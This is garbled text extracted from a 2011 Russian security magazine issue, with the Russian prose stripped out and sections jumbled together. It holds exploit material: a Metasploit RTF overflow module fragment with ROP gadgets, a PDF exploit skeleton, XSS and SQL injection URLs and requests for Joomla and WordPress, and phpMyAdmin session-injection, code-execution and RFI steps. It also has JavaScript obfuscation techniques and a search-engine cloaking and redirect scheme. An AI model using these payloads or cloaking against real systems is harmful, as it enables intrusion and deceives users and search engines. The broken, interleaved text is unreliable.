RTF (Rich Text Format) Microsoft Office
Word 2003:
044
.
.
:
{ \shp, { \*\shpinst.
. :
{\sp{\sn PropertyName}{\sv PropertyValueInformation}}
, \sp
: (\sn) (\sv).
POC RTF- \sn, pFragments
, \sv, pFragments.
, ,
, , ,
RTF- .
:
{\rtf1{\shp{\*\shpinst{\sp{\sn pFragments}{\sv A;B;[word1]
[word2][word3][hex_value_array]}}}}}
A , 2,4 8;
B ;
word1 2- (sizeof(WORD)), ;
X 09 /152/ 2011
, phpMyAdmin
word2 2- , word1;
word3 2- ,
;
word1*word2
hex_value_array,
;
hex_value_array , ,
, ,
.
word1, word2 word3 : , .
metasploit, rtf-,
:
sploit = "%d;%d;" % [el_size, el_count]
sploit << data.unpack('H*').first
sploit << rest.unpack('H*').first
content
content
content
content
content
= "{\\rtf1"
<< "{\\shp"
#
<< "{\\sp"
#
<< "{\\sn pFragments}"#
<< "{\\sv
#{sploit}}" #

mso.dll:
39200b61
39200b63
39200b66
39200b69
je short mso.39200b82
mov ecx,dword ptr ss:[ebp+8]
mov eax,dword ptr ds:[ecx+c]
and eax,0ffff
39200b6e
39200b6f
39200b73
39200b76
39200b77
39200b7a
push eax
;n
imul eax,dword ptr ss:[ebp+10]
add eax,dword ptr ds:[ecx+10]
push eax
; src
push dword ptr ss:[ebp+c]
; dest
call <jmp.&msvcr90.memcpy> ; memcpy - overflow!
39200b7f
39200b82
39200b83
add esp,0c
pop ebp
retn 0c
ROP-, .
ROP-:
0x3F2CB9E0
POP ECX
RETN
# HeapCreate() IAT = 3F10115C
0x3F389CA5
MOV EAX,DWORD PTR DS:[ECX]

RETN
# EAX == HeapCreate()
content << "}"

content << "}"
content << "}"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)
X 09 /152/ 2011
045

ROP-
XSS
CSRF
0x3F39AFCF
CALL EAX
RETN
# HeapCreate()
# EAX
#
0x3F2CB9E0
POP ECX
RETN
# pop 0x00008000 ECX
# ECX
#
0x3F39795E
0x3F39CB46
ADD EAX,ECX
POP ESI
RETN
# ECX EAX ,
# HeapAlloc, EAX RWX-
0x3F2CB9E0
POP ECX
RETN
# pop 0x3F3B3DC0 ECX,
# -
MOV DWORD PTR DS:[ECX],EAX

RETN
# RWX-
# 0x3F3B3DC0 (ECX)
POP EDX
RETN
# pop 0x00000024 EDX
0x3F39CB44
ADD ECX,EDX
ADD EAX,ECX
POP ESI
RETN
# 0x24 ECX ( )
0x3F398267
MOV EAX,ECX
RETN
0x3F2233CC
POP EAX
ADD DWORD PTR DS:[EAX],ESP
RETN
pop 0x3F3B3DC4 EAX,
0 -
, 0
ESP, ESP ,
( )
0x3F2D59DF
#
#
#
#
#
0x3F3A16DE
MOV DWORD PTR DS:[ECX],EAX

XOR EAX,EAX
POP ESI
RETN
# EAX (Stack Address+24 =
# ESP )
# ESI. ESI
# ,
0x3F398267
MOV EAX,ECX
RETN
0x3F2CB9E0
0x3F2F18CC POP EAX
RETN
# pop 0x3F3B3DC4 ( ESP address ) EAX
POP ECX
RETN
# pop 0x3F3B3DC0 ( ) ECX
0x3F389CA5
0x3F2B745E
046
MOV ECX,DWORD PTR DS:[EAX]

RETN

RETN
# EAX RWX-
X 09 /152/ 2011
PMA_createTargetTables
: Snake
CVE: CVE-2011-0611
, DEP/ASLR CVE-2011-0611, 4
2011 .
memcpy,
0x3F2B0A7C
XCHG EAX,EDI
RETN 4
# EDI = RWX-
0x3F2CB9E0
POP ECX
RETN
# pop 0x3F3B3DC0 ( ) ECX
EXPLOIT
DEP/ASLR Tatsumaki.
Adobe-X ( sandbox).
, cryptocme2.dll.
cryptocme2.dll:
<</Type/Catalog/Pages 3 0 R/OpenAction 5 0 R/AcroForm 7 0 R >>
And then
0x3F389CA5

RETN
# EAX RWX-
8 0 obj
<</Length 372>>
0x3F38BEFB
ADD AL,58
RETN
# - :)
0x3F2CB9E0
POP ECX
RETN
# pop 0x00000080 ECX
# (0x80 * 4 = 0x200 = )
0x3F3441B4
REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]

POP EDI
POP ESI
RETN
# RWX-
CALL EAX
RETN
#
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/2.6/">
<present><pdf><interactive>1</interactive></pdf></present>
</config>
<template xmlns="http://www.xfa.org/schema/xfatemplate/2.6/">
<subform name="form1" layout="tb" locale="en_US">
<pageSet></pageSet>
</subform></template></xdp:xdp>
endstream
endobj
0x3F39AFCF
xref
TARGETS
Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010,
Office 2004 2008 Mac, Office Mac 2011 Open XML File Format
Converter Mac.
SOLUTION
.
02
Adobe Reader X Atom Type Confusion

Vulnerability Exploit
CVSS V2 BASE SCORE:
9.3 (HIGH)
,
ASLR,
:).
TARGETS
Adobe Flash Player 10.2.154.27 Windows, Mac OS X, Linux,
Solaris, 10.2.156.12 Android;
Adobe AIR 2.6.19140;
Authplay.dll ( AuthPlayLib.bundle) Adobe Reader 9.x
9.4.4 10.x 10.0.1 Windows;
Adobe Reader 9.x 9.4.4 10.x 10.0.3 Mac OS X;
Adobe Acrobat 9.x 9.4.4 10.x 10.0.3 Windows Mac OS X

( )
Flash-.
(AV:N/AC:M/Au:N/C:C/I:C/A:C) (legend)
BRIEF
: 3 2011
X 09 /152/ 2011
SOLUTION
Adobe Flash Player.
047
SOLUTION
3.1.4 3.2-RC3.
, -
Author.
04
XSS- Joomla! 1.6.3
CVSSV2
(AV:N/AC:M/Au:N/C:P/I:P/A:P)
BRIEF
YGN
Joomla, : com_contact, com_content, com_newsfeeds
com_search. ,
, URL.
RTF-,
03
SQL- WordPress 3.1.3
CVSSV2
6.0
(AV:N/AC:M/Au:S/C:P/I:P/A:P)
BRIEF
WordPress , ,
. , ,
, .
: SQL, Editor, !
,
WordPress, , ,
.
EXPLOIT
- ,
, .
get_terms(), wp-includes/taxonomy.php, , ,
Editor SQL- orderby order. URL
SQL- (
[]):
http://localhost/wp-admin/edit-tags.php?
taxonomy=link_category&orderby=[]&order=[]
taxonomy=post_tag&orderby=[]&order=[]
taxonomy=category&orderby=[]&order=[]
get_bookmarks(),
wp-includes/bookmark.php, URL
: http://
localhost/wp-admin/link-manager.php?orderby=[]&
order=[].
, ,
, , . ,
sqlmap, BackTrack.
TARGETS
WordPress 3.1.3/3.2-RC1 , , .
048
6.8
EXPLOIT
Joomla!
,
QueryString, option searchword. PoC com_contact
QueryString :
http://attacker.in/joomla163_noseo/index.php?option=com_c
ontact&view=category&catid=26&id=36&Itemid=1";><script>alert(/XSS/)</script>
:
http://attacker.in/joomla163_noseo/index.php?option=com_c
ontent&view=category&id=19&Itemid=260&limit=10&filter_order_
Dir=&limitstart=&filter_order=><script>alert(/XSS/)</script>
http://attacker.in/joomla163_noseo/index.php?option=com_n
ewsfeeds&view=category&id=17&whateverehere=";><script>
alert(/XSS/)</script>&Itemid=253&limit=10&filter_order_
Dir=ASC&filter_order=ordering
http://attacker.in/joomla163_noseo/index.
php?option=";><script>alert(/XSS/)</script>&task=reset.
request
com_search searchword POST-

(Live HTTP Headers, Tamper Data, etc).
:
POST /joomla163/index.php HTTP/1.1
Referer: http://attacker.in/joomla163/
User-Agent: Konqueror/4.5
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: attacker.in
Accept-Encoding: gzip, deflate
Content-Length: 125
option=com_search&searchword='%2522%253C%252Fscript%253E%2
53Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E&ta
sk=search
TARGETS
Joomla! 1.6.3 .
X 09 /152/ 2011
? $c $_SESSION,
, , .
, config/config.inc.php
PHP-, !
.
server_synchronize.php:
SOLUTION
Joomla! 1.6.4 .
05

phpMyAdmin 3.x
CVSSV2
7.5
(AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
Mango phpMyAdmin -,
MySQL.
SQL- XSS ,
-. .
EXPLOIT
libraries/auth/swekey/swekey.auth.lib.php
266-276 :
if (strstr($_SERVER['QUERY_STRING'],'session_to_unset')
!= false)
{
parse_str($_SERVER['QUERY_STRING']);
session_write_close();
session_id($session_to_unset);
session_start();
$_SESSION = array();
session_destroy();
exit;
}
, parse_str
, , $_
SESSION. SQL XSS, ,
.
, , 42,
.
, $cf->getServerName($id) , , . $id,
$c[Servers], . , */,
PHP-. $c
$cf->getConfig() 26. , ,
:
public function getConfig()
{
$c = $_SESSION[$this->id];
foreach ($this->cfgUpdateReadMapping as $map_to =>
$map_from)
{
PMA_array_write($map_to, $c, PMA_array_read(
$map_from, $c));
PMA_array_remove($map_from, $c);
}
return $c;
}
X 09 /152/ 2011
466: $trg_db = $_SESSION['trg_db'];

477: $uncommon_tables = $_SESSION['uncommon_tables'];
674: PMA_createTargetTables($src_db, $trg_db, $src_link,
$trg_link, $uncommon_tables,
$uncommon_table_structure_diff[$s],
$uncommon_tables_fields, false);
PMA_createTargetTables . , $uncommon_
tables[$table_index] $trg_db
$_SESSION. , ,

preg_replace, 627-631.
, e
, ,
PHP-.
. :
Suhosin, ... : , ,
- .
, , .
libraries/display_tbl.lib.php, 1291-1299:
if ($GLOBALS['cfgRelation']['mimework'] &&
$GLOBALS['cfg']['BrowseMIME'])
{
if (isset($GLOBALS['mime_map'][$meta->name]['mimetype']) &&
isset($GLOBALS['mime_map'][$meta->name]['transformation']) &&
!empty($GLOBALS['mime_map'][$meta->name]'transformation']))
{
$include_file =
$GLOBALS['mime_map'][$meta->name]['transformation'];
if (file_exists('./libraries/transformations/'.
$include_file))
{
$transformfunction_name = str_replace('.inc.php', '',
$GLOBALS['mime_map'][$meta->name]['transformation']);
require_once
'./libraries/transformations/' . $include_file;
require_once $include_file,
$GLOBALS, . ,
$GLOBALS['mime_map'][$meta->name]['transformation'] ../../../../../../etc/passwd, /etc/
passwd. , .
exploit-db.com , 17510
17514, !
TARGETS
phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1
SOLUTION
phpMyAdmin . z
049

|qbz| (lopuxin.iv@yandex.ru, essenzo.net)
JAVASCRIPT:

,
-
,
, ,
.
JavaScript
-, (iframe), SEO.
JS-,
, , .
-, :
1. ?
web-,
,
.
:
HTML- ;
JavaScript-/JS- ;
CSS-/CSS- ;
( , data).
2. ?
:
( iframe
);
(,
JavaScript , - ).
3.
?
050
.
? , , . ,
/
, , . ,
.
.
4. / ?
: /
. PHP-, .
JavaScript:
, , .
HTML/CSS
, HTML- CSS-?
: JavaScript,
HTML-.
X 09/152/ 2011

(script.js). index.html
:
<script type="text/javascript"
src="./script.js"></script>
text, (script.js) javascript

. :
<script src="text/javascript"
type="./script.js"></script>
. , :
JJEncode
( //):
<html>
<script>
var html = '<center><h3> -</h3>
</center>'; // "html"-,

document.getElementsByTagName('html')[0].
innerHTML = html; //
<html> </html>
</script>
</html>
CSS-:
<html>
<script>
var css = 'body{margin:0px;}.subcl{padding:5px;}';
// "css" ,
//
document.getElementsByTagName('html')[0].
innerHTML = '<style>'+css+'</style>';
// <html> </html>
</script>
</html>
HTML CSS
,
JavaScript.
, - , .
.

<script>
,
,
.
.
(index.html) JavaScript-,
X 09/152/ 2011
<script src="text/javascript" type="http://host.

com////////
/script.js"></script>
: !
,
JavaScript.
:).
JavaScript-

JS-,
. ,
onLoad, onClick ..
:
HTTP://WWW
links
javascriptobfuscator.com
.
utf-8.jp/public/jjencode.html
.
dean.edwards.
name/packer
javascript.
jsbeautifier.org
.
<body onLoad="alert(1);"></body>
<textarea onClick="alert(1);"></textarea>
, body frameset
onLoad,
/.
, .
Cookie, Referrer
JavaScript , cookie (document.cookie),

(document.referrer) (location.href).
,
eval(),

JavaScript-.
,
:
DVD
dvd

JavaScript ,

.
cookievalue=||alert(1);||
:
<script>eval(unescape(document.cookie).
split("||")[1]);</script>
051
][akep
cookie-
, ||.
([1]) eval().
, ,
, , ,
! :
<?php
// JavaScript- + ( 123)
setcookie('cook', '||alert(1);document.
cookie="cook=123";||');
?>
<script>
//
eval(unescape(document.cookie).split('||')[1]);
</script>
, JavaScript, , location.href document.referrer.
Ajax
,

eval().
,
:
1. , ( l):
alert(1);
2. :
<script>function x(){try{return new XMLHttpRequest();}
catch(e){try{return new ActiveXObject('Msxml2.XMLHTTP');}
catch(e){try{return new ActiveXObject('Microsoft.
XMLHTTP');}catch(e){return null;}}}};function
y(){var z=x();if(z){z.open('get','./l');z.
onreadystatechange=function(){if(z.readyState==4){eval(z.
responseText);}};z.send(null);}};y();</script>
(
l). , , .
, , ,
Opera. ,

( nullbyte ASCII 0). ?
, Opera - . :
<html> - </html>
<?php echo(chr(0)); ?>
052

<script>alert(1); /* */</script>
,
. PHP , .
HTML-

HTML, . , :
<body><img src="./pict.jpg" a="al" b="er" c="t(1);"></body>
<script>a = document.body.innerHTML; eval(a.split('a="')
[1].split('"')[0]+a.split('b="')[1].split('"')[0]+a.
split(' c="')[1].split('"')[0]);</script>
img,
, .
HTML/JavaScript :
HTML:

JavaScript:
// alert(1);
/* alert(1); */
,
, jQuery, mooTools
. , (
).
, , , , ,
, , .
JS-.

/ JavaScript
,
JavaScript :
:
<script>document.getElementsByTagName("html")[0].innerHTML
= document.getElementsByTagName("body")[0].length;
</script>
:
<script>a=document;c='getElementsByTagName';a[c]("html").
innerHTML = a[c]("body")[0].innerHTML.length;</script>
document
a, getElementsByTagName c.
X 09/152/ 2011

, (, , ,
.length .getElementsByTagName)
(
). document,
getElementsByTagName, ,
:
1) document.getElementsByTagName
2) document['getElementsByTagName']
,
(getElementsByTagName), ,
,
.

//.
, .
,
, -,
. , :
:
<script>/* pOIEPGpmkG13Pg */ a /* PGpmkG13Pggweg */ = /*
mkG13Pg */ 'hahaha' /* pOIE13Pg */ ; /* wegEGoh */ alert /*
oiwboierhper */ ( /* igwepreorh */ a /* wbnponrhR */ ) /*
inboierh */ ; /* roinero */</script>
:
<script> weoibog = 'gwrobgoerh'; a = 'hahaha'; bfionb =
'wgeogioweg'; alert(a);
,
: a = hahaha; alert(a);.
.
PHP-
JavaScript. - ,
,
.
, :
/*/ alert(1); /*/ alert(2); /*/ alert(3); /*/
? :)
- , , X 09/152/ 2011

, -
:
<script> alert(document["\x63\x6F\x6F\x6B\x69\x65"]);
</script>
-,
cookie document, .
-, .
cookie ,
document.cookie, ,
( ), document.
cookie .
PHP- :
<?php
function cescape($s)
{
foreach (str_split($s,1) as $sym)
{
$d = dechex(ord($sym));
$c[] = (strlen($d) == 1) ? '0'.$d : $d;
}
053
return (''.'\\'.implode(''.'\\',$c));
}
?>
, JavaScript
, : document.
getElementById document[getElementById]. ,
.
-
. , getElementById.
:
<script> a = b(c(d())); </script>
, b, c d
. ,
, try{}catch(){}:
<script> try{a = b(c(d()))}catch(e){alert(e);} </script>
, , ,
,
.
,
getElementById?
:
<script>try{(getE(leme(ntB(yId()))))}catch(e){x = (e+'').
split('(').slice(1,5).join('');}</script>

getElementById, x.
? , ,
.
, JavaScript.
~ () : alert(~13);. -14.
-(+1).
, a , : a = ~[];
a -1. ?

0, , ~0
-(0+1), -1.
:
a
a
a
a
a
a
a
=
=
=
=
=
=
=
~[]; // -1
-~[]; // 1
[]^[]; // 0
~~[]; // 0
~true; // -2
~false; // -1
-~[]*(""+-~[]+-~-~-~-~-~[]+-~-~true); // 153
/ -
054
.
JavaScript.
, ,
.
, , code.
, charCodeAt(),
fromCharCode() .
:
a = (alert+'').split("ive ")[1].substr(0,4);
a
code. .
: alert(alert+);. - function alert()
{ [native code] }. , -
alert(),
.
, . ,
, JavaScript
. ,
,
, , (+).
/ JavaScript
. :
escape(); // URL
unescape(); // URL-
encodeURI(); // URI
decodeURI(); // URI-
String, ASCII- :
a = String.fromCharCode(97);
b = "b".charCodeAt();
, .match .replace.
, , .

(, ).
, ,
. []. , document.
this. JavaScript, this
, ,
. getElementById : this[document]
[getElementById].
,
.
, JavaScript- ,
,
.
:
, ,
/.
X 09/152/ 2011
+ ,
:
// location.href.split('/')[2];
( #?) //
location.href.split('#')[1] location.href.split('?').
slice(1);
// a = new Date();
JavaScript // <script id="jscode">a =
document.getElementById('jscode').innerHTML;</script>;
// a = document.
getElementsByTagName('html')[0].innerHTML;
// a = navigator.userAgent;
- // document.cookie;
, .
eval(),
document.write() .
alert() ,
,
, , . , eval()?
, this. eval() :
a = this["\x65\x76\x61\x6C"];.

a() eval().
:
1)
2)
3)
4)
"o", "O", "0"

"i", "I", "l", "1"
"_" ( "__", "___" ...)
"$" ( "$$", "$$$" ...)

, , .
, -
/ . : eval()
+ _() + _.
.
, alert(1);. ,
(ASCII ),
( ) . , ,
,
2-2,5 , ,
- (
). %,
URL-.
PHP-:
<?php
$a = "alert(1);";
$a = str_split($a, 2);
X 09/152/ 2011
$e = '';
foreach ($a as $v)
{
$e .= '%' . $v[0] . (ord($v[0])+ord($v[1]));
}
echo($e);
?>
: %a205%e215%t156%190%;59.
JavaScript:
function d(s)
{
s = s.split('%').slice(1);
c = '';
for (i = 0; i < s.length; i++)
{
c += s[0] + String.fromCharCode(
s.substr(1)-s[0].charCodeAt());
}
return c;
}
: eval(d('%a205
%e215%t156%190%;59'));.
.
,
:
z = '73706C697421736C696365216C656E6774682166726F6D436861
72436F6465217375627374722163686172436F64654174';
_='';
for(__=0;__<z.length/2;__++){_+=unescape('%'+z[__*2]+z[_
_*2+1]);}
_=_[_[0]+_[1]+_[2]+_[3]+_[4]]('!');function ___(__){__
= __[_[0]]('\x25')[_[1]](-~[]); _I='';for (_l=0;_l<__[_
[2]];_l++){_I+=__[_l][0]+String[_[3]](__[_l][_[4]](1)-__
[_l][0][_[5]]());}return _I;}
this['\x65\x76\x61\x6C'](___('%a205%e215%t156%190%;59'));

:
1. z = '....'
,
split!slice!length!fromCharCode!substr!charCod
eAt (\x73\x70\x6C\x69\x74...) \;
2. _='';for(...}
split!slice!length!fromCharCode!substr!
charCodeAt _;
3. _=_...('!');
, !;
4. function ___(__){...}
d() ;
5. this['\x65\x76\x61\x6C'](....);
, .
100% ,

. ,
,
,
. , . z
055

RushteR (rushter.com)

GOOGLE
, .

.

SEO. ,

,
.
SEO-, ,

.
, ?
.
,
().
. , , .
,
, ,
. : (),
,
.
,
056
,
,
. ,
, .

, ,
- (
Google).
:
1. ( ).
2.
.
,
, .
.
HTTP://WWW
links
jscompress.com

JavaScript .
jquery.com Jquery.
addons.mozilla.org/
en-US/firefox/addon/
modify-headers
modify headers
FireFox.
X 09/152/ 2011
Modify Headers
, Google
, User-Agent
.
, google PHP:
HTTP referrer;
User-Agent;
IP-;
JavaScript.
HTTP .
, ,
.
.
HTTP referrer

HTTP referrer.

:
1. .
2. .
:
<?php
if (strstr($_SERVER['HTTP_REFERER'],
"http://google.")
echo ' ';
else
echo ' ';
?>
,
- , . HTTP
referrer .
User-Agent
HTTP-
User-Agent .
.

.
, Google , , User-Agent.
:
Mozilla/5.0 (compatible; Googlebot/2.1;
+http://www.google.com/bot.html)
Googlebot/2.1 (+http://www.google.com/bot.html)
<?php
if(stristr("google",$_SERVER["HTTP_USER_AGENT"]))
echo ' ';
?>
IP-
IP-
. ,
, , .
, ,
.
IP- hostname
google:
<?php
$stop_ips_masks = array(
"66\.249\.[6-9][0-9]\.[0-9]+",
"70\.91\.180\.25",
"81\.159\.49\.212");
foreach ( $stop_ips_masks as $v )
{
if ( preg_match( '#^'.$v.'$#', $_SERVER['REMOTE_ADDR']))
{
echo ' ';
break;
}
}
if (strpos(gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google'))
echo ' ';
?>

,
, .
IP-
IP-,

.
, IP- :
<div style="display:none"><a href='target.php'>click</a></div>
X 09/152/ 2011
057
HTTP-
IP- :
<?php
$f = fopen('base.txt','a+');
fwrite($f,str_replace('.', '\.', "'".
$_SERVER['REMOTE_ADDR']."',\n"));
fclose($f);
?>
IP-, .

.
JS-
, ,
. JavaScript Google , ,
. , JS-

.
JQuery,
.
, , JavaScript-, , ,
. , .

? , - ,
: , , ,
..
, ,
.
,
JQuery:
$(document).ready(function () {
$(window).bind(
'click mousemove scroll resize keydown',function(event) {
alert(' : '+event.type);
});
});
,
, . image.png
:
<?php
if(stristr("google",$_SERVER["HTTP_USER_AGENT"]))
{
header('Content-Type: image/png' );
058
readfile('image2.png');
}
else
{
header('HTTP/1.1 404 Not Found');
die();
}
?>
png,
.htaccess :
AddType application/x-httpd-php .png
JavaScript ,
:
document.write('<img src="image.png"/>');
$('img[src*="png"]').error(function () {
alert(' ');
})
});
? image.
png ,
404.
JavaScript- , (
, ).
, JavaScript- Google ,
. ,
, ,
, , .
,
. ,
, ,
, ,
.
:
document.write('<div id="dialog" class="window"> <img
src="promo.jpg" style="cursor: pointer;"> </div> <div
2id="mask"></div>');
$("#dialog").css('position', 'absolute');
$("#dialog").css('display', 'none');
$("#dialog").css('z-index', '9999');
$("#mask").css('position', 'absolute');
$("#mask").css('left', '0');
$("#mask").css('top', '0');
$("#mask").css('z-index', '9000');
$("#mask").css('background-color', '#000000');
$("#mask").css('display', 'none');
$(window).bind('mousemove scroll resize keydown',
function (eve) {
var maskHeight = $(document).height();
var maskWidth = $(window).width();
$('#mask').css({
'width': maskWidth,
X 09/152/ 2011
,
:
1. :
Action = Modify
Name = Referer
Value = http://google.com
2. Options Always on.

3.
.

.
:
JQuery
'height': maskHeight
});
$('#mask').fadeIn(1000);
$('#mask').fadeTo("slow", 0.90);
$("#mask").css('background-color', '#000000');
var winH = $(window).height();
var winW = $(window).width();
$("#dialog").css('top', winH / 2 $("#dialog").height() / 2);
$("#dialog").css('left', winW / 2 $("#dialog").width() / 2);
$("#dialog").fadeIn(2000);
$(window).bind('click', function (event) {
$(this).load('pl.txt', function (resp) {
eval('window.location = "' + resp + '";');
$(this).unbind(event);
});});});});
- ,
,
,
pl.txt. ,
,
. - , ,

.
, , ,
. - :

.
,
, :). , ,
,
FireFox Modify Headers.
Modify Headers
X 09/152/ 2011
User Agent;
Referrer;
IP;
;
;
;
,
.
IP-
.
.htaccess, ,
.
Google Toolbar
, Google ,
,
Google Toolbar. ,
.
Google toolbar javascript,
. , . , ,
, .
Google, , ,
. ,
.
, , .
,
.
,
. ,
.
, IP-
. (javascript, ),

. ,
. z
059

oxdef (oxdef.info)
OWASP APPSEC EUROPE 2011:

?

-
Twitter,
IBM,
, ?
, , -
. , .
Intro
XSS, CSRF, SQLi, Click-Jacking - ,

, OWASP
WASC. The Open Web Application Security Project (OWASP)
, , .
, ,
-.
10
- OWASP Top10 (
,

. .).
, HTTP WebScarab Zed Attack Proxy,
WAF ModSecurity, - WebGoat .
, . AppSec Europe 2011 OWASP , ,
- .
OWASP AppSec
OWASP AppSec 2004 2005

, ,
, , .

,
-
( ).
( 7 11 ), ,
.
, .
060
(, , ),

- ( ). , . : Fortify/HP, Adobe,
IBM, Verizon, Microsoft, . ,
, :).
,
7 Elements Ltd
APT :). APT , Debian GNU/
Linux. APT Advanced Persistent Thread (
). ,
,
, ,
. ,
, -
, - .
( APT!)
( )
APT ! :) ,
APT, ,
.
:
-
. ,
,
. , , , ,

- ( ), SOAP-.
X 09/152/ 2011
, :)
XML Signature
XML-, id , . ,
,
, !

.
,
-
IBM
. ,
- ? ?
,
? , IBM

:). SDLC ,

.

Python
- InGuardians
Inc. ?, . ,
Python, , ,
Perl.
- , urllib/httplib
!
.
,
X 09/152/ 2011
pycit,

-.
, ,
- .
, , SVN, .
-
CTF, .
HackQuest , CTF .
,

HTTP- .
, , , . (-,
:),
:

(, ,
).
,
.
, , SDL ?
, SDL
.

Nokia Microsoft.
, ,
. ,
. Microsoft
,
, . -
HTTP://WWW
links

:
owasp.org/index.php/
AppSecEU2011

WASC:
www.webappsec.org
Top10
OWASP:
Category:OWASP_
Top_Ten_Project

-
OWASP:
Category:OWASP_
Testing_Project
061
-. , ...
,
.

-
(IETF). ,
-:
Mime-Sniffing;
Same-Origin Policy;
Secure Channel: * HSTS Strict Transport Security * TLS in
DNSSEC;
Frame-Options;
Content Security Policy;
Do-Not-Track.
, HSTS. SSL-stripping
. , , ,
- ,
HTTPS, , (,
ARP-spoofing), https-
http. , ,

SSL-. HTTP Strict Transport Security (HSTS)
- -,
HTTPS.
HTTPS- : StrictTransport-Security: max-age=15768000; includeSubDomains.
- -
15768000 HTTPS,
.

Denim Group.
iOS Android-
.
,
,
SQL- , , .
062

-: <iframe
src=the_scheme://stuff?param=PAYLOAD />. . , , , ,
,
.

Gotham Digital Science
-.
.
,
.
. , , ,
padding-
, :).
,
(
www.xakep.ru/magazine/
xa/119/058/1.asp).
.
.
Outro
. -
. ,
, ,
. ,
1592 I! ,
-
. OWASP AppSec
Europe .
.
:). ,
-
. z
X 09/152/ 2011
#HACKER TWEETS

. .
. ,
.
twitter.com/asintsov .
@cesarcer:
:
,
:
,
.
@PiotrBania:

( : t.co/UexpfJP),
pwnie
awards (t.co/F6biKi6).
:
,

.

,

( , ,
)
, Blackhat 2011 -.
@LulzSec:
,
! ,

.
!
@shaver:
** : Sony Electronics

C. .
@evdokimovds:
IDA v6.1 HexRays v1.5 .
http://t.co/Q4O0B5Q
X 09/152/ 2011
@0xcharlie:
!= -.
@j00ru:

MS11-056: CVE2011-1282:
User-Mode & .
: http://t.co/fEn.
:

CSRSS CVE-2011-1282.
@aaronportnoy:
,
,
cmp reg8,
0x3E. , ,

XML-?
:
XML- cmp reg8,
0x3E (0x3E :
'>'. cmp ).
,
, , ,
XML-... )
@0xcharlie:
MS:
Windows 7 0 .
,
250 000 .
, !
: Microsoft
... ...
@kingcope:
:
root- OpenSSH
3.5p1 FreeBSD.
http://t.co/DYHct9W
@crypt0ad:
, , ,
,
... #JOP.
: JOP Jump Oriented
Programming, ROP,

(JMP reg),
RETN.
@jeremiahg:

RSA
=
-.
@Ariel_Coronel:

+. ... ,
, ,
..
@dakami:
, 88-
,
iPad. .
@attackresearch:
,
, - .
063

M4g (icq 884888, http://snipper.ru)
PHPMYADMIN

IT-
,
MySQL- phpMyAdmin
,
.
.
, , phpMyAdmin
, :).
Mango
:
./libraries/auth/swekey/swekey.auth.lib.php
if (strstr($_SERVER['QUERY_STRING'],'session_to_unset')
!= false)
{
parse_str($_SERVER['QUERY_STRING']);
session_id($session_to_unset);
session_start();
$_SESSION = array();
session_destroy();
exit;
}
064
, ? parse_str().
,
- .
:
1. parse_str();
2. ;
$_SERVER[QUERY_STRING] ( ,
?).

( ).
, :
$_SESSION, .
Mango ,
, .
. session_write_close()
X 09/152/ 2011
RFI
, session_id()
,
. -
, session_start()
.

:
http://pma/?session_to_unset=123&token=
[]&_SESSION[foo]=bar
,
XSS SQL-.
.

.
./setup/lib/ConfigGenerator.
class.php:
public static function getConfigFile()
{
...
$c = $cf->getConfig();
...
$ret = '<?php ' . $crlf
...
if ($cf->getServerCount() > 0) {
...
foreach ($c['Servers'] as $id => $server) {
$ret .= '/* Server: ' .
strtr($cf->getServerName($id), '*/', '-')
. " [$id] */" . $crlf . '$i++;' . $crlf;
...
.
,
PHP- phpMyAdmin.
, $c[Servers] (
$id) . ,
,
.
getConfig(),
$c:
./libraries/config/ConfigFile.class.php
public function getConfig()
{
X 09/152/ 2011
Mango
$c = $_SESSION[$this->id];
...
return $c;
}
! $c
$_SESSION, , ,
!
PHP-,
./config/config.inc.php.
(
magic_quotes_gpc).
./config ,
.
WARNING
warning
,

,

.
./config
. :
magic_quotes_gpc = On
mysql-.
:
./server_synchronize.php
...
$trg_db = $_SESSION['trg_db'];
...
$uncommon_tables = $_SESSION['uncommon_tables'];
...
PMA_createTargetTables($src_db, $trg_db,
$src_link, $trg_link, $uncommon_tables,
$uncommon_table_structure_diff[$s],
$uncommon_tables_fields, false);
PMA_createTargetTables:
./libraries/server_synchronize.lib.php
function PMA_createTargetTables($src_db,
$trg_db, $src_link, $trg_link,
&$uncommon_tables, $table_index,
&$uncommon_tables_fields, $display)
{
...
$Create_Table_Query = preg_replace('/'
.PMA_backquote($uncommon_tables[$table_index])
.'/', PMA_backquote($trg_db) . '.'
.PMA_backquote(
$uncommon_tables[$table_index]),
DVD
dvd

.
HTTP://WWW
links
Unserialize-
:

bit.ly/
onZhAu.
PHP
: PHP-
bit.
ly/n0cowc.
065
while (*q != PS_DELIMITER) {

if (++q >= endptr) goto break_outer_loop;
}
if (p[0] == PS_UNDEF_MARKER) {
p++;
has_value = 0;
} else {
has_value = 1;
}
Mango
$Create_Query, $limit = 1);

...
, , $uncommon_tables[$table_index]
$trg_db preg_replace() $_SESSION. ,
PHP-
preg_replace() e (eval), .
e

: (.+)/e%00. , , ,

:).
, ,
,
.
, Suhosin patch
e,
.
. -
. -
.
. Mango , ,

.
, ,
PoC .
PHP Session Serializer Session Data Injection Vulnerability, unserialize()
PHP (
).
, . PHP- : PS_DELIMITER PS_UNDEF_MARKER.

,
. PHP:
while (p < endptr) {
zval **tmp;
q = p;
066
,
PS_DELIMITER
PS_UNDEF_MARKER.
( : ,
, ) $_SESSION, PS_UNDEF_MARKER.
:
<?php
session_start();
$_SESSION[$_POST['prefix'] . 'bla'] = $_POST['data'];
?>
<?php
session_start();
$_SESSION = array_merge($_SESSION, $_POST);
?>
: POST prefix=! data=|xxx|O:10:"evilObject":0:{}.

. , unserialize().
,
,

phpMyAdmin.
. unserialize(), , ,
__wakeup() .

,
. ,
:
http://site.com/phpMyAdmin/scripts/setup.php?
action=lay_navigation&eoltype=unix&token=[]&
configuration=a:1:{i:0;O:10:"PMA_Config":1:
{s:6:"source";s:[_]:"[__FTP__]";}}
RFI-,

file_exists(), , , FTP-.
(
),
, rdot.org
FTP .
, unserialize()- phpMyAdmin < 3.
X 09/152/ 2011
, , ,
, phpMyAdmin :).
,
( ).
:
1. phpMyadmin;
